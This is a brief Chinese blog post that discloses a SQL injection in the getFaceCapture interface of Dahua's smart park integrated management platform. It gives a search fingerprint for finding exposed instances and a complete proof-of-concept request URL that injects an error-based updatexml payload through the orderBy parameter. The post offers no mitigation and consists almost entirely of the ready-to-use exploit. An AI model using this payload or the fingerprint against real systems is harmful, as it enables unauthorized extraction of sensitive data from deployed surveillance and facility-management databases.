Dahuatech 智慧园区综合管理平台 getFaceCapture 接口存在SQL注入漏洞,攻击者通过漏洞可以执行任意SQL语句,获取数据库敏感信息
智慧园区综合管理平台
app="Dahuatech-智慧园区综合管理平台"
请求POC
/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(123)),0x7e),1)--%22%7D/extend/%7B%7D
456 篇文章
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!